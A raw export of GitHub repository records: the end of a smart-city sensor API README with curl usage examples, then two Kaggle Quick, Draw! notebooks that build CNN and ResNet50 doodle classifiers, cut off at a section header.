"text": "# smartcity\n\ncurl -X POST http://mysensor-db-906737534.us-east-2.elb.amazonaws.com/api/v1/sensor -H 'Content-Type: application/json' -d '{ \n \"sensor_id\": 81, \n \"recorded_time\": \"03:21:02.381230\", \n \"recorded_date\": \"2019-04-24” \n \"battery_health\": \"ok\", \n \"sensor_type\": \"humidity\", \n \"humidity_range\": 11, \n \"humidity_alarm_state\": \"warning\", \n \"geo_tag_location\": 95014 \n}' \n\nTo Get the data ,i.e querying through sensor_type=humidity \ncurl -k https://mysensor-db-906737534.us-east-2.elb.amazonaws.com/api/v1/sensor?sensor_type=humidity \nTo Get the data ,i.e querying through sensor_type=smoke \ncurl -k https://mysensor-db-906737534.us-east-2.elb.amazonaws.com/api/v1/sensor?sensor_type=smoke \nTo Get the data ,i.e querying all sensors \ncurl -k https://mysensor-db-906737534.us-b.amazonaws.com/api/v1/sensor | jq .\nTo grab the reports for lass 24 hrs \ncurl -k https://mysensor-db-906737534.us-b.amazonaws.com/api/v1/sensor/reports/24 | jq . \n\n"
}
] | 4 |
jominjimail/kaggle_first
|
https://github.com/jominjimail/kaggle_first
|
b91cb10bbb358a16b4068c3c760ea3c4ad5fc614
|
728330e8fba8a35d0b5699e06c3f8d8b6853260c
|
cb9677c977e6b7cd7fda2b2661d186d975b0a48d
|
refs/heads/master
| 2020-05-22T21:33:50.834654 | 2019-05-23T05:37:35 | 2019-05-23T05:37:35 | 186,529,262 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7596153616905212,
"alphanum_fraction": 0.7596153616905212,
"avg_line_length": 25,
"blob_id": "677c3ad142e5b85ec447e28e2e85cfb3ba6f7cc1",
"content_id": "81be61b3156fac03374afd062862e5574c6503bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 104,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 4,
"path": "/README.md",
"repo_name": "jominjimail/kaggle_first",
"src_encoding": "UTF-8",
"text": "# kaggle\n\n### Quick, Draw! Doodle Recognition Challenge\nhttps://www.kaggle.com/rookiebox/quick-draw-cnn\n"
},
{
"alpha_fraction": 0.6145612001419067,
"alphanum_fraction": 0.6320111155509949,
"avg_line_length": 24.110496520996094,
"blob_id": "5f1953e35a539117dafb609ba6ecad05bc170772",
"content_id": "2258a4e273d7aea6ab0ac2cb805f95d357760355",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13652,
"license_type": "no_license",
"max_line_length": 343,
"num_lines": 543,
"path": "/the-easiest-code-for-catching-doodle.py",
"repo_name": "jominjimail/kaggle_first",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # **Quick Draw: Catch Doodle!**\n\n# “Quick, Draw!” is a game created by Google. It's a game where one player is prompted to draw a picture of an object, and the other player needs to guess what it is. More details can be found [this post](https://towardsdatascience.com/quick-draw-the-worlds-largest-doodle-dataset-823c22ffce6b). \n# \n# This project is for building an image classifier model that can handle noisy and sometimes incomplete drawings and perform well on classifying 50 different animals.\n\n# Table of contents:\n# - [1. Load data](# 1. Load data)\n# - [2. Let's draw doodle](# 2. Let's draw doodle)\n# - [3. From strokes to Image](# 3. From strokes to Image)\n# - [4. Let's call all friends here!](# 4. Let's call all friends here!)\n# - [5. Modeling- CNN](# 5. Modeling- CNN)\n# - [6. Plot the result](# 6. Plot the result)\n# - [7. Modeling with ResNet50](# 7. Modeling with ResNet50)\n\n# In[ ]:\n\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set(style='white', context='notebook')\n\nnp.random.seed(36)\n\n\n# In[ ]:\n\n\nimport ast\nimport cv2\nimport dask.bag as db\n\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPool2D, Flatten, Dense, Dropout\nfrom keras.callbacks import EarlyStopping, ReduceLROnPlateau \n\nfrom keras.applications.resnet50 import ResNet50\nfrom tensorflow.keras.applications.vgg19 import VGG19\n\n\n# # 1. Load data <a></a>\n\n# I'm going to use only the train_simplified.zip file for training. And we will use only the animal drawings among them. Cause...they are soooo cute :-) To load all 50 animals files automatically, I'll make a list for filenames. \n\n# In[ ]:\n\n\n# list of animals \nanimals = ['ant', 'bat', 'bear', 'bee', 'bird', 'butterfly', 'camel', 'cat', 'cow',\n 'crab', 'crocodile', 'dog', 'dolphin', 'dragon', 'duck', 'elephant', 'fish',\n 'flamingo', 'frog', 'giraffe', 'hedgehog', 'horse', 'kangaroo', 'lion',\n 'lobster', 'monkey', 'mosquito', 'mouse', 'octopus', 'owl', 'panda',\n 'parrot', 'penguin', 'pig', 'rabbit', 'raccoon', 'rhinoceros', 'scorpion',\n 'sea turtle', 'shark', 'sheep', 'snail', 'snake', 'spider', 'squirrel',\n 'swan', 'teddy-bear', 'tiger', 'whale', 'zebra']\n\n\n# Before uploading all the files at once, let's take a test with .csv first.\n\n# In[ ]:\n\n\ndir_path = '../input/train_simplified/'\ndf = pd.read_csv(dir_path + animals[0] + '.csv')\ndf.head()\n\n\n# `drawing` is the stroke values, which is telling the drawing of animals. We need to exchage this data into image data later. `word` indicates the result of drawings or animals. `recognized` means whether the drawing was understood as a certain object or not. Let's take only the 10 rows per animals and filter the unrecogizable drawing out. \n\n# In[ ]:\n\n\nam = pd.DataFrame(columns = df.columns)\n\nfor i in range(len(animals)):\n filename = dir_path + animals[i] + '.csv'\n df = pd.read_csv(filename, nrows = 100)\n df = df[df.recognized == True]\n am = am.append(df)\n\n\n# In[ ]:\n\n\n# Check\nam.word.nunique()\n\n\n# # 2. Let's draw doodle <a></a>\n\n# Before data proprocessing and modeling, let's see how people drew animals. The image information can be found at `drawing` but in order to make it visual, we need some steps of processing. 
Let's take only 100 data for an example.\n\n# In[ ]:\n\n\n# Sampling only 100 examples\nex = am.sample(100)\nex.head()\n\n\n# In[ ]:\n\n\nex.drawing.head(1).values # -> strings\n\n\n# Take a note at the front of the result. \n# <br>\n# array(**[ ' [[ 34, 41 ... ]]]) **\n# <br>\n# This indicates this data is strings, not list.\n\n# In[ ]:\n\n\nex.drawing.head(1).map(ast.literal_eval).values # -> list\n\n\n# We can see that the dypes changed. Now we are able to use it for plotting the strokes. Let's convert the other data as well.\n\n# In[ ]:\n\n\n# Convert to list\nex['drawing'] = ex.drawing.map(ast.literal_eval)\n\n\n# Now we are going to meet our lovely cats, dogs and pandas. Take a look at the code below.\n\n# In[ ]:\n\n\n# Plot the strokes \n# fig, axs = plt.subplots(nrows = 10, ncols = 10, figsize = (10, 8))\n\n# for index, col in enumerate(ex.drawing):\n# ax = axs[index//10, index%10]\n# for x, y in col:\n# ax.plot(x,-np.array(y), lw = 3)\n# ax.axis('off')\n \n# plt.show()\n\n\n# The concept of visualization can be seen complex at the first sight but it's not true. First we will get 100 grids and put the drawing in the grids one by one. `enumerate()` will return the index and column values. Let's take one example to understand step by step. \n\n# In[ ]:\n\n\n# Understanding enumerate\nfor index, col in enumerate(ex.drawing[:12]):\n print('The index is ', index)\n print('Position will be ({}, {})'.format(index//10, index%10))\n print('The strokes are ', col)\n print('===========')\n\n\n# As you can see above `enumerate()` brings us the index and the values one by one. So we are going to plot the values at the given values by col. \n\n# In[ ]:\n\n\nfor index, col in enumerate(ex.drawing[:2]):\n print('==================================')\n for x, y in col:\n print('X is {}'.format(x))\n print('Y is {}'.format(y))\n print('-----------------------')\n\n\n# So what we are going to do is ploting these x, y values just like what we've been doing with graphs. Now let's apply all this into one shot and finally meet our lovely friends.\n\n# In[ ]:\n\n\n# Plot the strokes \nfig, axs = plt.subplots(nrows = 10, ncols = 10, figsize = (10, 8))\n\nfor index, col in enumerate(ex.drawing):\n ax = axs[index//10, index%10]\n for x, y in col:\n ax.plot(x,-np.array(y), lw = 3)\n ax.axis('off')\n \nplt.show()\n\n\n# OMG 🙉🙈😍.....This is so funny.\n\n# # 3. From strokes to Image <a></a>\n\n# Now the next step is transforming all these drawings into image data. Like I said above, the data isn't in the form of image data. We have to covert it into numpy array format. I'm going to make a function for this. \n\n# In[ ]:\n\n\nim_size = 64\nn_class = len(animals)\n\n\n# In[ ]:\n\n\n# define a function converting drawing to image data\ndef draw_to_img(strokes, im_size = im_size):\n\n fig, ax = plt.subplots() # plot the drawing as we did above\n for x, y in strokes:\n ax.plot(x, -np.array(y), lw = 10)\n ax.axis('off')\n \n fig.canvas.draw() # update a figure that has been altered\n A = np.array(fig.canvas.renderer._renderer) # converting them into array\n \n plt.close('all')\n plt.clf()\n \n A = (cv2.resize(A, (im_size, im_size)) / 255.) # image resizing to uniform format\n \n return A\n\n\n# All the things we discussed at the second section are put inside the `draw_to_img()` function. 
Let's try it with an example.\n\n# In[ ]:\n\n\nX = ex.drawing.values\nimage = draw_to_img(X[1])\nplt.imshow(image)\n\n\n# In[ ]:\n\n\nimage.shape\n\n\n# The image has 4 channels and we can also check each channels separately.\n\n# In[ ]:\n\n\n# Channel selection \nfig, axs = plt.subplots(nrows = 1, ncols = 4, figsize = (10, 10))\n\nfor i in range(4):\n ax = axs[i]\n ax.imshow(image[:, :, i])\n\n\n# We will make the input image shape as `(im_size, im_size, 3)`, which means it has only one channels. Therefore we''ll take only the last channel here.\n\n# In[ ]:\n\n\n# redefine\ndef draw_to_img(strokes, im_size = im_size):\n fig, ax = plt.subplots() # plot the drawing as we did above\n for x, y in strokes:\n ax.plot(x, -np.array(y), lw = 10)\n ax.axis('off')\n \n fig.canvas.draw() # update a figure that has been altered\n A = np.array(fig.canvas.renderer._renderer) # converting them into array\n \n plt.close('all')\n plt.clf()\n \n A = (cv2.resize(A, (im_size, im_size)) / 255.) # image resizing to uniform format\n\n return A[:, :, :3] # drop the last one \n\n\n# In[ ]:\n\n\nimage = draw_to_img(X[1])\nplt.imshow(image)\nprint(image.shape)\n\n\n# # 4. Let's call all friends here! <a></a>\n\n# Now we are ready to apply what we've been doing so far into the entire dataset.\n\n# In[ ]:\n\n\nn_samples = 500\nX_train = np.zeros((1, im_size, im_size, 3))\ny = []\n\nfor a in animals:\n print(a)\n filename = dir_path + a + '.csv'\n df = pd.read_csv(filename, usecols=['drawing', 'word'], nrows=n_samples) # import the data in chunks\n df['drawing'] = df.drawing.map(ast.literal_eval) # convert strings into list\n X = df.drawing.values\n \n img_bag = db.from_sequence(X).map(draw_to_img) # covert strokes into array\n X = np.array(img_bag.compute()) \n X_train = np.vstack((X_train, X)) # concatenate to get X_train \n \n y.append(df.word)\n\n\n# As I just stack the array, the dimension of `X_train` has one more values than it's expected. Therefore we'll drop the first layer. \n\n# In[ ]:\n\n\n# The dimension of X_train\nX_train.shape\n\n\n# In[ ]:\n\n\n# Drop the first layer\nX_train = X_train[1:, :, :, :]\nX_train.shape\n\n\n# Don't forget to encoding the categorical data before modeling fitting\n\n# In[ ]:\n\n\n# Encoding \ny = pd.DataFrame(y)\ny = pd.get_dummies(y)\ny_train = np.array(y).transpose()\n\n\n# In[ ]:\n\n\n# Check the result\nprint(\"The input shape is {}\".format(X_train.shape))\nprint(\"The output shape is {}\".format(y_train.shape))\n\n\n# Now let's combine the X_train and y_train again. This is for splitting the data into the trainning set and validation set. 
\n\n# In[ ]:\n\n\n# Reshape X_train\nX_train_2 = X_train.reshape((X_train.shape[0], im_size*im_size*3))\n\n# Concatenate X_train and y_train\nX_y_train = np.hstack((X_train_2, y_train))\n\n\n# \n\n# In[ ]:\n\n\n# Random shuffle\nnp.random.shuffle(X_y_train)\na = im_size*im_size*3\ncut = int(len(X_y_train) * .1)\nX_val = X_y_train[:cut, :a]\ny_val = X_y_train[:cut, a:]\nX_train = X_y_train[cut:, :a]\ny_train = X_y_train[cut:, a:]\n\n# Reshape X_train back to (64, 64)\nX_train = X_train.reshape((X_train.shape[0], im_size, im_size, 3))\nX_val = X_val.reshape((X_val.shape[0], im_size, im_size, 3))\n\n\n# Check the final shape of train and validation set.\n\n# In[ ]:\n\n\n# Check the result\nprint(\"The input shape of train set is {}\".format(X_train.shape))\nprint(\"The input shape of validation set is {}\".format(X_val.shape))\nprint(\"The output shape of train set is {}\".format(y_train.shape))\nprint(\"The output shape of validation set is {}\".format(y_val.shape))\n\n\n# # 5. Modeling- CNN <a></a>\n\n# I'm going to start with the basic CNN model as a baseline. And then compare the results with ResNet and VGG19\n\n# In[ ]:\n\n\nn_epochs = 10\nbatch_size = 500\n\n# Initialize\nmodel = Sequential()\n\n# ConvNet_1\nmodel.add(Conv2D(32, kernel_size = 3, input_shape = (im_size, im_size, 3), padding = 'same', activation = 'relu'))\nmodel.add(MaxPool2D(2, strides = 2))\n# Dropout\nmodel.add(Dropout(.2))\n\n# ConvNet_2\nmodel.add(Conv2D(64, kernel_size = 3, activation = 'relu'))\nmodel.add(MaxPool2D(2, strides = 2))\n# Dropout\nmodel.add(Dropout(.2))\n\n# ConvNet_3\nmodel.add(Conv2D(64, kernel_size = 3, activation = 'relu'))\nmodel.add(MaxPool2D(2, strides = 2))\n# Dropout\nmodel.add(Dropout(.2))\n\n# Flattening\nmodel.add(Flatten())\n\n# Fully connected\nmodel.add(Dense(680, activation = 'relu'))\n\n# Dropout\nmodel.add(Dropout(.5))\n\n# Final layer\nmodel.add(Dense(n_class, activation = 'softmax'))\n\n# Compile\nmodel.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n\n# In[ ]:\n\n\nmodel.summary()\n\n\n# I'll also add callbacks not to get overfitting. \n\n# In[ ]:\n\n\n# Early stopper\nstopper = EarlyStopping(monitor='val_top_3_accuracy', mode='max', patience = 3)\n\n# Learning rate reducer\nreducer = ReduceLROnPlateau(monitor = 'val_acc',\n patience = 3,\n verbose = 1,\n factor = .5,\n min_lr = 0.00001)\n\ncallbacks = [stopper, reducer]\n\n\n# In[ ]:\n\n\n# Fitting baseline\nhistory = model.fit(X_train, y_train, epochs = n_epochs, batch_size = batch_size, \n validation_split = .2, verbose = True)\n\n\n# # 6. Plot the result <a></a>\n\n# Let's see how well our model is trained.\n\n# In[ ]:\n\n\n# Train and validation curves\nfig, (ax1, ax2) = plt.subplots(2, 1)\nax1.plot(history.history['loss'], color = 'b', label = 'Train Loss')\nax1.plot(history.history['val_loss'], color = 'm', label = 'Valid Loss')\nax1.legend(loc = 'best')\n\nax2.plot(history.history['acc'], color = 'b', label = 'Train Accuracy')\nax2.plot(history.history['val_acc'], color = 'm', label = 'Valid Accuracy')\nax2.legend(loc = 'best')\n\n\n# # 7. Modeling with ResNet50\n\n# It's seem not good. 
Let's try other pre-trained model.\n\n# In[ ]:\n\n\n# ResNet50 Application \nmodel_r = ResNet50(include_top = True, weights= None, input_shape=(im_size, im_size, 3), classes = n_class)\n\n\n# In[ ]:\n\n\nmodel_r.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\nmodel_r.summary()\n\n\n# In[ ]:\n\n\nn_epochs = 5\nbatch_size = 50\n\n\n# In[ ]:\n\n\n# Fitting ResNet50\nhistory_r = model_r.fit(X_train, y_train, epochs = n_epochs, batch_size = batch_size, \n validation_split = .2, verbose = True)\n\n\n# In[ ]:\n\n\n# Train and validation curves with ResNet50\nfig, (ax1, ax2) = plt.subplots(2, 1)\nax1.plot(history_r.history['loss'], color = 'b', label = 'Train Loss')\nax1.plot(history_r.history['val_loss'], color = 'm', label = 'Valid Loss')\nax1.legend(loc = 'best')\n\nax2.plot(history_r.history['acc'], color = 'b', label = 'Train Accuracy')\nax2.plot(history_r.history['val_acc'], color = 'm', label = 'Valid Accuracy')\nax2.legend(loc = 'best')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n"
},
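The matplotlib round-trip in `draw_to_img` above (create a figure, render it, read the canvas back) is the notebook's main bottleneck. Drawing the strokes straight into a PIL image avoids figure creation entirely; a sketch assuming the simplified dataset's 0-255 coordinate space (the line width is an arbitrary choice, and the output is single-channel, so stack it if a model expects 3 channels):

```python
import numpy as np
from PIL import Image, ImageDraw

def draw_to_img_fast(strokes, im_size=64):
    img = Image.new("L", (256, 256), color=255)  # simplified strokes fit in 256x256
    draw = ImageDraw.Draw(img)
    for x, y in strokes:
        draw.line(list(zip(x, y)), fill=0, width=6)
    img = img.resize((im_size, im_size))
    return np.array(img) / 255.0  # shape (im_size, im_size), floats in [0, 1]
```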
{
"alpha_fraction": 0.589798092842102,
"alphanum_fraction": 0.630778431892395,
"avg_line_length": 26.573259353637695,
"blob_id": "f93af518bb240fb5f3720211076bfc0dbb99dd71",
"content_id": "22da6b6e3267bffb542e2f293db40b0b0fb9b446",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18338,
"license_type": "no_license",
"max_line_length": 344,
"num_lines": 546,
"path": "/Quick_Draw_cnn.py",
"repo_name": "jominjimail/kaggle_first",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# \n# **Quick Draw** 게임을 해보니 제한 시간 안에 그림을 그리면 AI가 \"이건가요?\" \"저건가요?\" 말하다가 \"아 알겠어요 이건 만리장성입니다.\" 이런 게임이다. 사실 엄청나게 놀랬다. 완성된 그림을 주는 게 아니라 한 획, 한 획 그리는 와중에 정답을 말하는 AI의 성능이 대단하다고 생각했다. class가 340개라는 한정이 있지만 모든 사람이 동그라미조차도 같게 그리지 않으므로 만리장성을 맞춘 건 대단하다고 생각한다.\n# \n# 데이터셋을 받아서 구조 분석을 하는 데에는 Getting Started{[image-Based CNN](https://www.kaggle.com/jpmiller/image-based-cnn),[Quick Draw! - Simple EDA](https://www.kaggle.com/dimitreoliveira/quick-draw-simple-eda)} 커널을 참고했다. 나의 예상과는 다르게 인풋 데이터가 이미지가 아닌 선들의 좌표 배열이었다. 이 좌표를 이용해서 다시 이미지로 변환한 다음 input으로 사용할 예정이다. 이미지를 분류하는 데는 CNN이 성능이 가장 좋으니까 CNN을 포커스로 잡고 진행하였다.\n# \n# 데이터가 선 1, 선 2, 선 3 이런 식으로 시간의 속성이 들어가서 LSTM을 적용해도 괜찮을 것 같지만 자신 있는 CNN으로 과제를 진행하고 시간이 남는다면 바꿔보는 것도 괜찮을 것 같다.\n# \n# ***\n\n# # 1차 사용 방법 \n# \n# **CNN**<br>\n# 이미지의 데이터가 많은 상황에서 CNN은 최고의 성능을 낸다. \n# \n# **keras**<br>\n# 원래 tensorflow를 사용했었지만, 카글에서 keras를 처음 사용해봤다.<br>\n# input, kernel, output을 블록으로 설명한 부분이 인상 깊었고 tensorflow 기반으로 만들어져서 그런지 습득하고 사용하는데 많은 부담감은 없었다.<br>\n# 코드가 훨씬 깔끔하고 사용하기 쉽지만 keras가 tensorflow를 커버할 수 없다고 한다. 이는 좀 더 사용해봐야 알 것 같다.\n# \n# ***\n# \n# # 2차 사용 방법\n# \n# **배치 사이즈와 에폭수를 늘려보았다.** \n# \n# - batch_size = 32, epochs = 22 <br> \n# Private Score 0.60357 <br>\n# Public Score 0.60229\n# \n# - batch_size = 128, epochs = 50 <br>\n# Private Score 0.62959 <br>\n# Public Score 0.63262\n# \n# - batch_size = 128, epochs = 100 <br>\n# Private Score 0.62893 <br>\n# Public Score 0.62818\n# \n# 하이파라미터에 의존하는 것보단 다른 방법을 생각해봐야겠다.\n# \n# ***\n\n# \n# # 3차 사용 방법 \n# \n# 2차 사용 방법은 '전체 데이터셋을 한 번에 읽어오는 방법'이다. 최종적으로 (680000, 1025) 배열을 만들었다. <br>\n# keras 에서 model.fit_generator() 함수를 보고 스텝 바이 스텝으로 data generator를 만드는 것을 적용해보았다. \n# \n# ==> 실패했다. <br>\n# 왜 실패한 건지 도무지 모르겠다. 에폭이 증가하지 않는다. <br>\n# [Fork of Quick_Draw_FAIL](https://www.kaggle.com/rookiebox/fork-of-quick-draw-cnn-fail)커널에 기록해놨다.<br>\n# 모델의 input의 shape와 데이터의 shape를 맞춰주면 될 것 같았지만, 실행이 되지 않았다. 에러 메세지도 출력되지 않고 어느 순간 CPU의 점유율이 0%로 떨어졌다.\n# \n# ***\n# \n# # 4차 사용 방법\n# \n# 클래스 마다(.csv) 2500개의 값 중 (recognized == True) 을 만족하는 2000개의 값만 사용한다. <br>\n# 이를 무작정 10000 값으로 늘려봤다. 하지만 이 많은 데이터를 한 번에 로드하는 것은 메모리가 버티지 못해 문제가 생겼고(중간에 커널의 연결이 계속 off 되었다)<br>\n# '좌표를 이용해서 다시 이미지로 변환'하는 과정이 생각보다 너무 오래 걸려서 다른 방법을 생각해봐야 겠다.\n# \n# 기존 데이터셋의 [None, 32, 32, 1] 배열을 [None, 80, 2]로 바꿔보았다. <br>\n# 다른 코드를 살펴보니 x, y 값이 차례로 있다고 한다. 연속된 좌표의 패턴을 학습해보자.\n# 단, 이렇게 input 데이터의 shape를 바꾸면 기존에 사용했던 모델을 변경해야 한다.\n# \n# ==> 성공했다. <br>\n# 한 클래스당 사용하는 값의 수를 2000에서 10000으로 5배 늘렸다. <br>\n# 기존 [32,32] shape에서 [80,2] shape로 줄이니 연산속도가 더 빨랐고 더 많은 값을 사용할 수 있었다. <br>\n# 기존에 사용했던 2D Convolution을 1D Convolution 모델로 변경하고 돌려보았다.\n# \n# - epochs = 3 <br> \n# Private Score 0.71686<br>\n# Public Score 0.71671\n# - epochs = 10 <br> \n# Private Score 0.76240 <br>\n# Public Score 0.75738\n# - epochs = 30 <br> \n# Private Score <br>\n# Public Score \n# 30에서 강제 새로고침을 당했다...\n# - epochs = 25 <br> \n# Private Score 0.77515<br>\n# Public Score 0.77511\n# ***\n# \n# 아쉬운 점 <br>\n# keras의 EarlyStopping 함수를 사용해보고 싶었는데 callback으로 넣어주면 자꾸 에러가 생겨 진행이 안 돼서 뺐다. 그래서 어느 시점에 epoch을 멈춰야하는지 일일이 돌려봐야 했다. 
\n# \n# ***\n\n# ## training data 구조 분석\n# 'Getting Started' kernel을 참고했다.<br>\n# - glob 폴데에 있는 모든 파일 접근해서 list 형태로 변환\n# - tqdm for문의 상태바 보여줌\n\n# In[ ]:\n\n\nimport os\nimport re\nfrom glob import glob\nfrom tqdm import tqdm\nimport numpy as np\nimport pandas as pd\nimport ast\nimport matplotlib.pyplot as plt\nget_ipython().magic(u'matplotlib inline')\n\n\n# \n# \n\n# In[ ]:\n\n\nfnames = glob('../input/train_simplified/*.csv') #<class 'list'>\ncnames = ['countrycode', 'drawing', 'key_id', 'recognized', 'timestamp', 'word']\ndrawlist = []\nfor f in fnames[0:6]: # num of word : 5\n first = pd.read_csv(f, nrows=10) # make sure we get a recognized drawing\n first = first[first.recognized==True].head(2) # top head 2 get \n drawlist.append(first)\ndraw_df = pd.DataFrame(np.concatenate(drawlist), columns=cnames) # <class 'pandas.core.frame.DataFrame'>\ndraw_df\n\n\n# 그림 데이터는 아래와 같이 숫자들의 배열로 저장한다. \n# ```\n# drawing.values = [[선1점1, 선1점2, 선1점3, ... 선1점n], [선2점1, 선2점2, 선2점3, ... 선2점n], ..., [선i점1, 선i점2, 선i점3, ... 선i점n]]\n# ```\n\n# In[ ]:\n\n\ndraw_df.drawing.values[0]\n\n\n# In[ ]:\n\n\nevens = range(0,11,2)\nodds = range(1,12, 2)\n# We have drawing images, 2 per label, consecutively\ndf1 = draw_df[draw_df.index.isin(evens)]\ndf2 = draw_df[draw_df.index.isin(odds)]\n\nexample1s = [ast.literal_eval(pts) for pts in df1.drawing.values]\nexample2s = [ast.literal_eval(pts) for pts in df2.drawing.values]\nlabels = df2.word.tolist()\n\nfor i, example in enumerate(example1s):\n plt.figure(figsize=(6,3))\n \n for x,y in example:\n plt.subplot(1,2,1)\n plt.plot(x, y, marker='.')\n plt.axis('off')\n\n for x,y, in example2s[i]:\n plt.subplot(1,2,2)\n plt.plot(x, y, marker='.')\n plt.axis('off')\n label = labels[i]\n plt.title(label, fontsize=10)\n\n plt.show() \n\n\n# In[ ]:\n\n\nget_ipython().magic(u'reset -f')\n\n\n# ## 모델 만들기\n# \n# 이제 CNN 모델을 만들어보자.<br>\n# csv의 데이터에서 x, y점의 좌표를 읽어와 모델의 input으로 주기 위한 전처리 작업이 필요하다.\n# \n# - Dask 패키지는 Pandas 데이터프레임 형식으로 빅데이터를 처리하기 위한 파이썬 패키지이다.\n# \n# ### **코드의 주석은 1차 사용 방법의 주석입니다. **\n\n# In[ ]:\n\n\n\nimport os\nfrom glob import glob\nimport re\nimport ast\nimport numpy as np \nimport pandas as pd\nfrom PIL import Image, ImageDraw \nfrom tqdm import tqdm\nfrom dask import bag\nimport json\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom keras.models import Model\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.metrics import top_k_categorical_accuracy\nfrom keras.layers import Input, Conv1D, Dense, Dropout, BatchNormalization, Flatten, MaxPool1D\nfrom tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, EarlyStopping\n\n\n# > The data are also available in a zip file (automatically extracted inside the Kernels environment).\n# > 카글은 대단하다.\n\n# In[ ]:\n\n\npath = '../input/train_simplified/'\nclassfiles = os.listdir(path)\n\nnumstonames = {i: v[:-4].replace(\" \", \"_\") for i, v in enumerate(classfiles)} # sleeping bag -> sleeping_bag\nfiles = [os.path.join(path, file) for i, file in enumerate(classfiles)]\nword_mapping = {file.split('/')[-1][:-4]:i for i, file in enumerate(files)}\n\nnum_classes = len(files) #340\nimheight, imwidth = 32, 32 # size of an image\nims_per_class = 2000 #max? # in the code above and above, there existed more than 100 thousand images per class(/label)\nsequence_length = 80\n\n\n# ## 1. TRAIN 데이터 만들기 \n# \n# 한 class 마다 (class 개수는 340) sleeping bag.csv 에서 15000 읽어온다. 
(단, 필요한 col인 'drawing', 'recognized'만 뽑아온다)<br>\n# 이중 'recognized' 가 'True' 인 애들 탑 10000 개를 뽑는다.\n# \n# **배열 X**<br>\n# sequence of x- 와 y-coordinates 의 패턴을 X 배열에 넣는다. [10000, 80, 2]<br>\n# X 배열의 차원을 줄여 [10000, 160] 배열을 만든다.\n# \n# **배열 y**<br>\n# y 배열에는 class를 구별할 수 있는 index 값을 넣어 [10000, 1] 배열을 만든다.\n# \n# X와 y 배열을 합쳐준다. [10000, 161]\n# \n# **배열 train_grand**<br>\n# [10000, 161] 을 'train_grand'에 append 해준다.<br>\n# shape을 변경해준다. [340, 10000, 161] -> [3400000, 161]\n# \n# \n# \n\n# In[ ]:\n\n\ntrain_grand= []\n\nclass_paths = glob('../input/train_simplified/*.csv')\n\ndf = []\n\nfor i,c in enumerate(tqdm(class_paths[0: num_classes])):\n train = pd.read_csv(c, usecols=['drawing', 'recognized'], nrows=15000) # [2500 rows x 2 columns]\n train = train[train.recognized == True].head(10000) # use data only recognized == True -> [2000 rows x 2 columns]\n \n X = []\n for values in train.drawing.values:\n image = json.loads(values)\n strokes = []\n for x_axis, y_axis in image:\n strokes.extend(list(zip(x_axis, y_axis)))\n strokes = np.array(strokes)\n pad = np.zeros((sequence_length, 2))\n if sequence_length>strokes.shape[0]:\n pad[:strokes.shape[0],:] = strokes\n else:\n pad = strokes[:sequence_length, :]\n X.append(pad)\n X = np.array(X)\n y = np.full((train.shape[0], 1), i)\n X = np.reshape(X, (10000, -1))\n X = np.concatenate((y, X), axis=1)\n train_grand.append(X)\n \n \n# trainarray = np.reshape(trainarray, (ims_per_class, -1)) # (2000, 1024)\n# labelarray = np.full((train.shape[0], 1), i) # (2000, 1) fill with 'i' 0~339\n# trainarray = np.concatenate((labelarray, trainarray), axis=1) # (2000, 1025)\n# train_grand.append(trainarray)\n\ntrain_grand = np.array([train_grand.pop() for i in np.arange(num_classes)]) \nprint(train_grand.shape)\ntrain_grand = train_grand.reshape((-1, sequence_length*2+1))\nprint(train_grand.shape)\n\ndel X\ndel train\n\n\n# ## 2. TRAIN, VALIDATION data 나누기\n# \n# 전체 데이터 셋 3400000중 10%는 validation data로 90%는 train data로 사용한다.\n# \n# y_train : (3060000, 340)\n# \n# X_train : (3060000, 80, 2) \n# \n# y_val : (340000, 340) \n# \n# X_val : (340000, 80, 2)\n# \n\n# > keras.utils.to_categorical() 은 \n# > \n# > ex: y_tain=[0,2,1,2,0] 이라하면, \n# > y_train= [[ 1., 0., 0.],\n# > [ 0., 0., 1.],\n# > [ 0., 1., 0.],\n# > [ 0., 0., 1.],\n# > [ 1., 0., 0.]] 로 변경된다.\n\n# In[ ]:\n\n\nvalfrac = 0.1 \ncutpt = int(valfrac * train_grand.shape[0])\nprint(cutpt)\n\nnp.random.shuffle(train_grand)\ny_train, X_train = train_grand[cutpt: , 0], train_grand[cutpt: , 1:]\ny_val, X_val = train_grand[0:cutpt, 0], train_grand[0:cutpt, 1:]\n\ndel train_grand\n\ny_train = keras.utils.to_categorical(y_train, num_classes)\nX_train = X_train.reshape(-1, sequence_length,2)\n\ny_val = keras.utils.to_categorical(y_val, num_classes)\nX_val = X_val.reshape(-1, sequence_length,2)\n\nprint(y_train.shape, \"\\n\",\n X_train.shape, \"\\n\",\n y_val.shape, \"\\n\",\n X_val.shape)\n\n\n# ## 3. 
